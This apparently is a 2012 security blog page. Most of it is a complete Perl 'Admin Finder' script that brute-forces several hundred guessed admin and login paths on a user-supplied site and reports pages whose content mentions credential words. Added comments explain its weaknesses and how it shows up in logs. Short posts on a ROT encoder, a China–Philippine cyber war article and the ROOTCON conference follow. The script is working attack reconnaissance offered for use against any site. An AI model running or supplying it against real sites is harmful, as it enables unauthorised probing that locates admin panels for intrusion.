Thursday, May 24, 2012

Perl Admin Finder


#!/usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

# Interactive front end: clears the screen, prints a banner, reads the target
# base URL and a "language" selector from STDIN, then normalises the URL.
# No `use strict` is in effect, so $site and $code are package globals that the
# scan branches further down read directly.
system('clear');   # shells out to the external `clear` command



print"\n";
print "===========================================================\n" ;
print "-----------------------------------------------------------\n" ;
print "=-=-=-=-=-=- Admin Finder 2.0 =-=-=- By Kouback_TR_ ==-=-=-\n" ;
print "=-=-=-=-==-==-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-\n" ;
print "-----------------------------------------------------------\n" ;
print "===========================================================\n" ;
print "\n";

# Prompt (Portuguese): asks for the site to scan, e.g. a host or host/subpath.
print "[!] Informe o site que deseja realizar o scan\n* USE EXEMPLO: www.googel.com ou www.google.com/sub\n-> ";

# The value is taken as typed; nothing below validates it beyond the scheme
# prefix and trailing slash handling.
$site=<STDIN>;

chomp $site;



print "\n";
# Prompt (Portuguese): asks which server-side language the site uses.
# The accepted values are asp, php, cfm, html or todos ("all"). Any other
# input matches none of the `if($code eq ...)` branches later in the script,
# so the run ends without sending a request.
print "[!] Informe a linguagem usada pelo site $site \n*[DISPONIVEIS~ asp, php, cfm, html ou todos\n-> ";
$code=<STDIN>;
chomp($code);



# Scheme handling: only a leading "http:" is recognised. Input that starts
# with "https://" does not match and gets 'http://' prepended as well.
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
# Ensure the base ends in '/', because candidate paths are appended by plain
# string concatenation.
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}

# Status lines (Portuguese): echo the normalised target and the selected
# language, then announce that the search for login pages is starting.
print "\n";
print "OK scaneando site ~ $site\n";
print "OK usando linguagem ~ $code\n";
print "BUNCANDO PAGINAS DE LOGIN !\n\n\n";



if($code eq "asp"){


@path1=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp','admin/home.asp','admin/controlpanel.asp','admin.asp','admin/cp.asp','cp.asp',
'administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp',
'moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','admin_login.asp','panel-administracion/login.asp',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.asp','adminpanel.asp','webadmin.asp','pages/admin/admin-login.asp','admin/admin-login.asp',
'webadmin/index.asp','webadmin/admin.asp','webadmin/login.asp','user.asp','user.asp','admincp/index.asp','admincp/login.asp','admincp/index.asp',
'admin/adminLogin.asp','adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','admin/admin_login.asp',
'admincontrol/login.asp','adm/index.asp','adm.asp','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.asp'

);



# Request every candidate .asp/admin path in @path1, one GET at a time.
# In the target's access log a run appears as a sequential burst of requests
# for admin-style paths. No agent string is set on the LWP::UserAgent, so the
# requests carry its default "libwww-perl/<version>" User-Agent.
foreach $ways(@path1){



# Candidate URL = normalised base + path, joined by plain concatenation.
$final=$site.$ways;


# A new request object and a new user agent are built for every path.
# Each request may wait up to 30 seconds.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


# Classification uses the response body only; the HTTP status is never
# consulted. A "found" line therefore means "the body contained one of these
# case-sensitive substrings", not "this URL is an admin login". A custom
# error page or any page with a login box counts as a hit, and /Sing/ also
# matches inside words such as "Single". /Admin Password/ is already covered
# by /Password/.
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

# Also reached when the request itself failed (timeout, connection error),
# because only the body text is inspected.
print "[-]Ops.. Not Found <~ $final\n";

}

}

}


# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------

if($code eq "cfm"){



@path1=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin_area/index.cfm','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin/controlpanel.cfm','admin.cfm','admin/cp.cfm','cp.cfm',
'administrator/index.cfm','administrator/login.cfm','administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm',
'moderator/login.cfm','moderator/admin.cfm','account.cfm','controlpanel.cfm','admincontrol.cfm','admin_login.cfm','panel-administracion/login.cfm',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm',
'webadmin/index.cfm','webadmin/admin.cfm','webadmin/login.cfm','user.cfm','user.cfm','admincp/index.cfm','admincp/login.cfm','admincp/index.cfm',
'admin/adminLogin.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','admin/admin_login.cfm',
'admincontrol/login.cfm','adm/index.cfm','adm.cfm','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.cfm'

);

# Request every candidate .cfm/admin path in @path1, one GET at a time.
# No agent string is set, so the requests carry LWP's default
# "libwww-perl/<version>" User-Agent. Together with the run of admin-style
# paths, that makes the scan easy to spot in an access log.
foreach $ways(@path1){

# Candidate URL = normalised base + path.
$final=$site.$ways;



# New request and user agent per path; 30-second timeout per request.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);



# The body is matched against case-sensitive substrings; the HTTP status is
# not checked. A hit means "the body mentions a credential-like word", so
# custom error pages and ordinary pages with a login form are reported too.
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

# Transport failures end up here as well, because only the body is inspected.
print "[-]Ops.. Not Found <~ $final\n";

}

}

}



# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------





if($code eq "php"){



@path2=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin_area/index.php','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php',
'bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin/controlpanel.php','admin.php','admin/cp.php','cp.php',
'administrator/index.php','administrator/login.php','administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php',
'moderator/login.php','moderator/admin.php','account.php','controlpanel.php','admincontrol.php','admin_login.php','panel-administracion/login.php',
'admin/home.php','admin/controlpanel.php','admin.php','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','admin/cp.php','cp.php',
'administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php','moderator/login.php','administrator/login.php',
'moderator/admin.php','controlpanel.php','admin/account.php','adminpanel.php','webadmin.php','pages/admin/admin-login.php','admin/admin-login.php',
'webadmin/index.php','webadmin/admin.php','webadmin/login.php','user.php','user.php','admincp/index.php','admincp/login.php','admincp/index.php',
'admin/adminLogin.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admin/admin_login.php',
'admincontrol/login.php','adm/index.php','adm.php','admincontrol.php','admin/account.php','adminpanel.php','webadmin.php','webadmin/index.php',
'webadmin/admin.php','webadmin/login.php','admin/admin_login.php','admin_login.php','panel-administracion/login.php','adminLogin.php',
'admin/adminLogin.php','home.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','admin-login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','administrator/index.php',
'admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php',
'adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.php'

);


# Request every candidate .php/admin path in @path2, one GET at a time.
# No agent string is set, so the requests carry LWP's default
# "libwww-perl/<version>" User-Agent. Together with the run of admin-style
# paths, that makes the scan easy to spot in an access log.
foreach $ways(@path2){

# Candidate URL = normalised base + path.
$final=$site.$ways;



# New request and user agent per path; 30-second timeout per request.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


# The body is matched against case-sensitive substrings; the HTTP status is
# not checked. A hit means "the body mentions a credential-like word", so
# custom error pages and ordinary pages with a login form are reported too.
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

# Transport failures end up here as well, because only the body is inspected.
print "[-]Ops.. Not Found <~ $final\n";

}

}

}


# -------------------------------------------------------
#----------------------test html------------------------|
# -------------------------------------------------------





if($code eq "html"){



@path3=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.html','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.html','admin/controlpanel.html','admin.html','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','admin/cp.html','cp.html',
'administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html','moderator/login.html','administrator/login.html',
'moderator/admin.html','controlpanel.html','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.html','user.html','admincp/index.html','admincp/login.html','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html',
'webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','adminLogin.html',
'admin/adminLogin.html','home.html','admin.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html','admin-login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','administrator/index.html',
'admincontrol/login.html','adm/admloginuser.html','admloginuser.html','admin2.html','admin2/login.html','admin2/index.html','adm/index.html',
'adm.html','affiliate.html','adm_auth.html','memberadmin.html','administratorlogin.html','siteadmin/login.html','siteadmin/index.html','siteadmin/login.html'

);


# Request every candidate .html/admin path in @path3, one GET at a time.
# No agent string is set, so the requests carry LWP's default
# "libwww-perl/<version>" User-Agent. Together with the run of admin-style
# paths, that makes the scan easy to spot in an access log.
foreach $ways(@path3){

# Candidate URL = normalised base + path.
$final=$site.$ways;



# New request and user agent per path; 30-second timeout per request.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


# The body is matched against case-sensitive substrings; the HTTP status is
# not checked. A hit means "the body mentions a credential-like word", so
# custom error pages and ordinary pages with a login form are reported too.
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

# Transport failures end up here as well, because only the body is inspected.
print "[-]Ops.. Not Found <~ $final\n";

}

}

}




# -------------------------------------------------------
#----------------------test todos------------------------|
# -------------------------------------------------------





if($code eq "todos"){



@path3=('admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.html','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.html','admin/controlpanel.html','admin.html','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','admin/cp.html','cp.html',
'administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html','moderator/login.html','administrator/login.html',
'moderator/admin.html','controlpanel.html','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.html','user.html','admincp/index.html','admincp/login.html','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html',
'webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','adminLogin.html',
'admin/adminLogin.html','home.html','admin.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html','admin-login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','administrator/index.html',
'admincontrol/login.html','adm/admloginuser.html','admloginuser.html','admin2.html','admin2/login.html','admin2/index.html','adm/index.html',
'adm.html','affiliate.html','adm_auth.html','memberadmin.html','administratorlogin.html','siteadmin/login.html','siteadmin/index.html','siteadmin/login.html','admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin/account.php','admin/index.php','admin/login.php','admin/admin.php',
'admin_area/admin.php','admin_area/login.php','admin_area/index.php','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php',
'bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin/controlpanel.php','admin.php','admin/cp.php','cp.php',
'administrator/index.php','administrator/login.php','administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php',
'moderator/login.php','moderator/admin.php','account.php','controlpanel.php','admincontrol.php','admin_login.php','panel-administracion/login.php',
'admin/home.php','admin/controlpanel.php','admin.php','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','admin/cp.php','cp.php',
'administrator/account.php','administrator.php','login.php','modelsearch/login.php','moderator.php','moderator/login.php','administrator/login.php',
'moderator/admin.php','controlpanel.php','admin/account.php','adminpanel.php','webadmin.php','pages/admin/admin-login.php','admin/admin-login.php',
'webadmin/index.php','webadmin/admin.php','webadmin/login.php','user.php','user.php','admincp/index.php','admincp/login.php','admincp/index.php',
'admin/adminLogin.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admin/admin_login.php',
'admincontrol/login.php','adm/index.php','adm.php','admincontrol.php','admin/account.php','adminpanel.php','webadmin.php','webadmin/index.php',
'webadmin/admin.php','webadmin/login.php','admin/admin_login.php','admin_login.php','panel-administracion/login.php','adminLogin.php',
'admin/adminLogin.php','home.php','admin.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','admin-login.php',
'panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','administrator/index.php',
'admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php',
'adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.php','admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp','admin/home.asp','admin/controlpanel.asp','admin.asp','admin/cp.asp','cp.asp',
'administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp',
'moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','admin_login.asp','panel-administracion/login.asp',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.asp','adminpanel.asp','webadmin.asp','pages/admin/admin-login.asp','admin/admin-login.asp',
'webadmin/index.asp','webadmin/admin.asp','webadmin/login.asp','user.asp','user.asp','admincp/index.asp','admincp/login.asp','admincp/index.asp',
'admin/adminLogin.asp','adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','admin/admin_login.asp',
'admincontrol/login.asp','adm/index.asp','adm.asp','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.asp',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.asp','admin/','intranet/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin_area/index.cfm','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin/controlpanel.cfm','admin.cfm','admin/cp.cfm','cp.cfm',
'administrator/index.cfm','administrator/login.cfm','administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm',
'moderator/login.cfm','moderator/admin.cfm','account.cfm','controlpanel.cfm','admincontrol.cfm','admin_login.cfm','panel-administracion/login.cfm',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm',
'webadmin/index.cfm','webadmin/admin.cfm','webadmin/login.cfm','user.cfm','user.cfm','admincp/index.cfm','admincp/login.cfm','admincp/index.cfm',
'admin/adminLogin.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','admin/admin_login.cfm',
'admincontrol/login.cfm','adm/index.cfm','adm.cfm','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.cfm',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.cfm'

);


# "todos" (all) mode: @path3 here holds the html, php, asp and cfm lists
# concatenated, including the repeated directory entries. The same URL can
# therefore be requested more than once during a run.
# No agent string is set, so the requests carry LWP's default
# "libwww-perl/<version>" User-Agent.
foreach $ways(@path3){

# Candidate URL = normalised base + path.
$final=$site.$ways;



# New request and user agent per path; 30-second timeout per request.
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


# The body is matched against case-sensitive substrings; the HTTP status is
# not checked. A hit means "the body mentions a credential-like word", so
# custom error pages and ordinary pages with a login form are reported too.
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/

){

print " \n [!] OHH..PAGE FOUND ~> $final\n\n";

}else{

# Transport failures end up here as well, because only the body is inspected.
print "[-]Ops.. Not Found <~ $final\n";

}

}

}

Online ROT Encoder / Decoder

Here is a link to my favorite ROT Encoder / Decoder that allows you to rotate the numbers as well:

http://theblob.org/rot.cgi

Enjoy :)

Tuesday, May 15, 2012

The History of the China - Philippine Cyber War

Hey guys, it's been a long time since I last updated this blog, so I decided to post a simple link back to the article I wrote for Infosec Institute, Understanding the Origins of the China – Philippine Cyber War. I wrote this article for general purposes because I have been following the spark of their retaliation, and because the media is getting the information about its history all wrong.

Check it out :)

Regards,

shipcode

PS: I will be busy updating The ProjectX Blog, ROOTCON Blog and will be actively contributing articles to Infosec Institute.

Monday, March 12, 2012

Hacker Conference in the Philippines == ROOTCON


 ROOTCON 6 which is the premier hacker conference in the Philippines is back again and will be held on September 7-8, 2012 at Cebu Parklane International Hotel.

ROOTCON comes from the two words “ROOT” (super user on Unix systems) and “CON” (conference). ROOTCON operation started 27-December-2008, registered as DEFCON Group 6332, and carried the name DEFCONPH. The group held two small gatherings under DEFCONPH – known as the BeerTalks.

After the two consecutive gatherings, DEFCON brought up their copyright protection concerns, having observed that the Philippine Hacker and InfoSec group was carrying a name very similar to theirs.

